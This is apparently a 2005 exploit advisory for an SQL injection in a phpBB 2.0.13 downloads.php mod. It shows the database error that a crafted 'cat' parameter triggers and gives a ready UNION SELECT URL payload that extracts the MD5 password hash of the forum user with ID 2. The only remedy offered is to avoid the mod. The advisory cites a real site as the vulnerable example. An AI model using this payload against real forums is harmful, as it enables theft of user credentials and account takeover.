heres a update of the paper:

phpBB 2.0.13 <= downloads.php Mod SQL injection

[ www.batznet.com ]

##############################################

Discussion:
--------------------
This exploit makes it possible to insert SQL Code through downloads.php


Bug:
--------------------
http://www.phpbb.de/downloads.php?cat=batz

Spits out an error msg:

Could not query downloads

DEBUG MODE

SQL Error : 1054 Unknown column 'leet' in 'where clause'

SELECT * FROM phpbb2_downloads where cat=leet ORDER by sort

Line : 106
File : downloads.php



Exploit:
--------------------
/downloads.php?cat=-1%20UNION%20SELECT%200,user_password,0,0,0,0,0,0,0%20FRO
M%20phpbb_users%20WHERE%20user_id=2/*

This gives the MD5 hash from UID 2!


Patch:
-------------------
Dont use this Mod. :)


Greetz:
-------------------
Greetz fly out to R_Q, darkkilla, Madinfect, EaTh, kr3mliyn


// written by [R]
// 02.04.2005